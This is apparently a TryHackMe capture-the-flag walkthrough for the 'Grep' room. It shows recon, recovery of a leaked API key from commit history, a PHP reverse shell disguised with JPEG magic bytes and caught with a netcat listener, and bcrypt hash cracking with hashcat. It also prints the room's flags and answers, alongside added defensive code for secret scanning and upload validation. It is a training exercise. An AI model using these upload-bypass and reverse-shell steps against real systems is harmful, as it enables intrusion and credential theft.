@PythonCoderUnicorn
Created February 14, 2025 17:38
TryHackMe writeup for room Grep

THM Grep Walkthrough

Welcome to the OSINT challenge, part of TryHackMe’s Red Teaming Path. In this task, you will be an ethical hacker aiming to exploit a newly developed web application.

SuperSecure Corp, a fast-paced startup, is currently creating a blogging platform and inviting security professionals to assess its security. The challenge involves using OSINT techniques to gather information from publicly accessible sources and exploit potential vulnerabilities in the web application.

Your goal is to identify and exploit vulnerabilities in the application using a combination of recon and OSINT skills. As you progress, you’ll look for weak points in the app, find sensitive data, and attempt to gain unauthorized access. You will leverage the skills and knowledge acquired through the Red Team Pathway to devise and execute your attack strategies.

  • add the machine's IP address to /etc/hosts (e.g. sudo nano /etc/hosts) as: 10.10.x.x grep.thm

nmap

22/tcp    open  ssh
80/tcp    open  http
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp   open  https
| ssl-cert: Subject: commonName=grep.thm/organizationName=SearchME/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2023-06-14T13:03:09
|_Not valid after:  2024-06-13T13:03:09
51337/tcp open  unknown
| ssl-cert: Subject: commonName=leakchecker.grep.thm/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2023-06-14T12:58:31
|_Not valid after:  2024-06-13T12:58:31
| tls-alpn: 
|_  http/1.1
MAC Address: 02:6F:C7:43:91:87 (Unknown)

We see port 80 open, so we go to the webpage and see the Apache2 Ubuntu default page. We searched for CVEs for Apache2

(CVE-2021-34798)
(CVE-2021-33193)
(CVE-2021-36160)
(CVE-2021-39275)
(CVE-2021-40438)

but these are not useful to us.

checking port 51337

Our nmap scan shows port 51337 is open and serving TLS, so it needs HTTPS.

  • https://grep.thm:51337/
  • also add leakchecker.grep.thm to /etc/hosts (the certificate's commonName)
  • https://leakchecker.grep.thm:51337/

This site is an email leak checker.

(This step actually happened later in the process but was moved here because it is a dead end.)

gobuster

We need to find what directories exist. It is important to add -k so that gobuster skips TLS certificate verification; otherwise it fails on the certificate errors.

gobuster dir -u http://grep.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 --no-error -k

This returns:

  • /phpmyadmin
  • /server-status
  • both are access-restricted

Try again over HTTPS: https://grep.thm

The site hosts SearchMe! with a login and a register page.

  • tried SQL injection: fails
  • entering dummy data returns "Invalid or Expired API key"

Let's enumerate directories:

gobuster dir -u https://grep.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -t64 --no-error -k

returns:

  • /login.php
  • /register.php

Burp Suite

Enter dummy data into the register form, capture the request in Burp Suite, then send it to Repeater.

Request -----------------------------------------
POST /api/register.php HTTP/1.1
Host: grep.thm
Cookie: PHPSESSID=v51597kkgp6v45ipkvl0n9gtj3
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://grep.thm/public/html/register.php
Content-Type: application/json
X-Thm-Api-Key: e8d25b4208b80008a9e15c8698640e85
Content-Length: 76
Origin: https://grep.thm
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{"username":"test","password":"test","email":"[email protected]","name":"tester"}


Response -------------------------------------
{"error": "Invalid or Expired API key"}

We see an API key, but the server rejects it. The room picture shows a GitHub logo, so we search GitHub for SearchMe (same results for searchme) and look for repositories written in PHP.

This repository has an /api/ directory containing:

  • register.php
  • upload.php

Check all of the files and the commit history.

In the commit history we see a commit that deleted an API key: ffe60ecaa8bba2f12b43d1a4b15b8f39. Go back to Burp Suite Repeater, paste this key into the X-Thm-Api-Key header and send: ✅
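The lesson at this step is that a secret removed from the working tree lives on in the commit history. As an added example (not the writeup's or the SearchMe project's code), the Python below walks `git log -p` output and flags 32-hex tokens on added or removed lines, using a Shannon entropy threshold to skip padding and repeated characters. The log excerpt, the path api/config.php, the commit ids and the THM_API_KEY variable are constructed placeholders; the key value is the one the writeup found.

```python
import math
import re
from collections import namedtuple

Finding = namedtuple("Finding", "commit change line_no secret")

# Candidate shape: 32 hex characters, like the X-Thm-Api-Key value captured in Burp.
HEX32 = re.compile(r"\b[0-9a-f]{32}\b")


def shannon_entropy(s: str) -> float:
    """Bits per character: random hex sits near 4.0, words and repeats far lower."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))


def scan_history(log_text: str, min_entropy: float = 3.0):
    """Walk `git log -p` output and report hex tokens on added ('+') or removed ('-')
    lines. A key that a later commit deleted from the tree is still in the history,
    which is exactly how the registration key was recovered above."""
    findings, commit = [], None
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            for token in HEX32.findall(line):
                if shannon_entropy(token) >= min_entropy:
                    findings.append(Finding(commit, line[0], line_no, token))
    return findings


def unique_secrets(findings) -> set:
    """The distinct values that must be rotated: every one of them is public once pushed."""
    return {f.secret for f in findings}


# Constructed `git log -p` excerpt (placeholder commit ids and file path, hypothetical
# THM_API_KEY environment variable); the key value is the one from the writeup.
SAMPLE_LOG = """\
commit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Author: dev <dev@example.com>

    remove api key from source

diff --git a/api/config.php b/api/config.php
--- a/api/config.php
+++ b/api/config.php
@@ -1,3 +1,3 @@
 <?php
-$apiKey = 'ffe60ecaa8bba2f12b43d1a4b15b8f39';
+$apiKey = getenv('THM_API_KEY');
commit bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Author: dev <dev@example.com>

    initial commit

diff --git a/api/config.php b/api/config.php
--- /dev/null
+++ b/api/config.php
@@ -0,0 +1,3 @@
+<?php
+$apiKey = 'ffe60ecaa8bba2f12b43d1a4b15b8f39';
+$uploadPath = 'api/uploads/';
"""

if __name__ == "__main__":
    import sys
    # Pipe `git log -p --all` in; with no piped input, run on the embedded sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    for f in scan_history(text):
        print(f"{f.commit[:12]} {f.change} line {f.line_no}: {f.secret}")
```

Both the commit that introduced the key and the one that "removed" it are reported. Once a key shows up here the only fix is to rotate it; rewriting history does not recall clones and forks.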

Our credentials:
{"username":"test","password":"test","email":"[email protected]","name":"tester"}

Log in to SearchMe and we see:

First Flag THM{4ec9806d7e1350270dc402ba870ccebb}

gobuster

Now that we have access to the website and the first flag, we also notice there is more to the URL path (/public/html/), so we enumerate directories under it:

gobuster dir -u https://grep.thm/public/html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 --no-error -x php,hs,html -k

This returns:

  • /admin.php
  • /upload.php
  • /dashboard.php (we were there for the flag)

The GitHub repo history also shows $uploadPath='api/uploads/', which is worth checking out as well.

  • so we go to https://grep.thm/public/html/upload.php

PHP reverse shell

  • https://grep.thm/public/html/upload.php

The GitHub repo code shows that the upload handler checks file types by extension and magic bytes:

$allowedExtensions = ['jpg', 'jpeg', 'png', 'bmp'];
$validMagicBytes = [
    'jpg' => 'ffd8ffe0', 
    'png' => '89504e47', 
    'bmp' => '424d'
];
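The check above looks only at the extension list and the first bytes of the file, which is why the writeup can prepend JPEG magic bytes to a PHP file and have it accepted. The Python below is an added example (not code from the room or the SearchMe repository): it reimplements the leading-bytes check beside a stricter one that walks the JPEG marker segments or PNG chunks, verifies PNG CRCs, rejects trailing data, and stores the file under a server-chosen name whose extension comes from the parsed container. Assumptions: the naive variant reduces the repo's check to the magic-byte comparison (the behaviour the writeup observed), the sample images and the polyglot are constructed here, and a production handler would additionally decode and re-encode the image with a real library and keep uploads outside the web root.

```python
import secrets
import struct
import zlib

# Allowlist and magic-byte table as quoted in the writeup from the SearchMe repo.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "bmp"}
VALID_MAGIC_BYTES = {
    "jpg": bytes.fromhex("ffd8ffe0"),
    "png": bytes.fromhex("89504e47"),
    "bmp": bytes.fromhex("424d"),
}
PNG_SIG = bytes.fromhex("89504e470d0a1a0a")


def naive_check(data: bytes) -> bool:
    """Leading-bytes check only. Assumption: effectively what the room's upload.php
    enforced, since a .php file with a JPEG prefix was accepted."""
    return any(data.startswith(magic) for magic in VALID_MAGIC_BYTES.values())


def jpeg_well_formed(data: bytes) -> bool:
    """Walk the marker segments from SOI to SOS and require EOI as the last bytes."""
    if not (data.startswith(b"\xff\xd8") and data.endswith(b"\xff\xd9")):
        return False
    pos, seen_sof = 2, False
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:  # markers with no payload
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):  # e.g. the 00 00 in the polyglot
            return False
        if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):
            seen_sof = True  # a frame header (SOFn) is present
        if marker == 0xDA:  # SOS: entropy-coded data runs until the EOI checked above
            return seen_sof
        pos += 2 + length
    return False


def png_well_formed(data: bytes) -> bool:
    """Walk the chunks, verify every CRC, and allow nothing after IEND."""
    if not data.startswith(PNG_SIG):
        return False
    pos, expect_ihdr = len(PNG_SIG), True
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data) or (expect_ihdr and ctype != b"IHDR"):
            return False
        expect_ihdr = False
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(data[pos + 4:end - 4]) != crc:
            return False
        if ctype == b"IEND":
            return end == len(data)  # anything appended after IEND is rejected
        pos = end
    return False


def bmp_well_formed(data: bytes) -> bool:
    """'BM' followed by the declared file size, which must equal what we received."""
    return len(data) >= 14 and data[:2] == b"BM" and struct.unpack("<I", data[2:6])[0] == len(data)


PARSERS = {"jpg": jpeg_well_formed, "png": png_well_formed, "bmp": bmp_well_formed}


def strict_check(filename: str, data: bytes):
    """Return (stored_name, reason). The stored name is server-generated and its
    extension comes from the container we parsed, never from the client."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return None, "extension not allowed"
    kind = "jpg" if ext == "jpeg" else ext
    if not PARSERS[kind](data):
        return None, f"content is not a well-formed {kind}"
    return f"{secrets.token_hex(16)}.{kind}", "ok"


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


# Constructed samples (not files from the room): a structurally minimal JPEG, a 1x1 PNG,
# and a polyglot built the way the writeup does it (JPEG magic bytes glued onto PHP).
MINIMAL_JPEG = bytes.fromhex(
    "ffd8"                                         # SOI
    "ffe0 0010 4a46494600 0101 00 0001 0001 0000"  # APP0 "JFIF"
    "ffc0 000b 08 0001 0001 01 01 11 00"           # SOF0: 1x1, one component
    "ffda 0008 01 01 00 00 3f 00"                  # SOS
    "00"                                           # entropy-coded data
    "ffd9"                                         # EOI
)
MINIMAL_PNG = (PNG_SIG
               + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
               + _png_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
               + _png_chunk(b"IEND", b""))
POLYGLOT = bytes.fromhex("ffd8ffe0000000") + b'<?php echo "not an image"; ?>'

if __name__ == "__main__":
    print("naive check accepts polyglot:", naive_check(POLYGLOT))
    for name, blob in [("revshell.php", POLYGLOT), ("revshell.jpg", POLYGLOT),
                       ("pic.jpg", MINIMAL_JPEG), ("pic.png", MINIMAL_PNG + b"extra")]:
        print(name, "->", strict_check(name, blob))
```

The polyglot passes naive_check and fails strict_check twice over: its .php extension is not allowed, and renamed to .jpg it has no EOI marker and an impossible APP0 length. Just as important is the last line of strict_check: because the stored name never ends in .php, a file that does slip through is served as an image rather than executed, which is the step the room's /api/uploads/ directory lacked.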

Get a PHP reverse shell file and change the IP address and port to your attacker machine's. We also need to change the file header so it is read as a JPG instead of PHP.

  • have the revshell.php file ready
  • at the top of revshell.php add placeholder bytes (AAAAAAAA) that will be overwritten
  • run hexedit revshell.php

Modify the file from (top row shown):

00000000   3C 3F 70 68  70 0A 2F 2F  20 70 68 70  2D 72 65 76  <?php.// php-rev

to:

00000000 ff d8 ff e0 00 00 00 

Make sure you only overwrite the bytes up to <?php so that no A's are left; the row should read .....<?php

  • now go to /upload.php and upload the revshell.php file
  • you should see "File uploaded successfully"
  • in your terminal start a netcat listener: nc -nlvp 4445 (or whatever port you used in revshell.php)

In another browser tab navigate to https://grep.thm/api/uploads and click on revshell.php, then check your terminal for the reverse shell.

stabilize the shell

python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
stty rows 38 columns 116

navigate the system

ls 
tryhackme ubuntu
cd /var/www/
ls -la
cd leakchecker/
ls
cd ..
cd backup
ls
cat users.sql

INSERT INTO `users` (`id`, `username`, `password`, `email`, `name`, `role`) VALUES
(1, 'test', '$2y$10$dE6VAdZJCN4repNAFdsO2ePDr3StRdOhUJ1O/41XVQg91qBEBQU3G', '[email protected]', 'Test User', 'user'),
(2, 'admin', '$2y$10$3V62f66VxzdTzqXF4WHJI.Mpgcaj3WxwYsh7YDPyv1xIPss4qCT9C', '[email protected]', 'Admin User', 'admin');

You now have all of the data you need:

  • hashes.com hash identifier: bcrypt ($2y$, Blowfish-based)
  • $2y$10$3V62f66VxzdTzqXF4WHJI.Mpgcaj3WxwYsh7YDPyv1xIPss4qCT9C
  • hashcat -m 3200 -a 0 -o cracked.txt hashfile.txt /usr/share/wordlists/rockyou.txt

the flags

What is the API key that allows a user to register on the website?
ffe60ecaa8bba2f12b43d1a4b15b8f39

What is the first flag?
THM{4ec9806d7e1350270dc402ba870ccebb}

What is the email of the "admin" user?
[email protected]

What is the host name of the web application that allows a user to check an email for a possible password leak?

leakchecker.grep.thm

What is the password of the "admin" user?

admin_tryhackme

reference
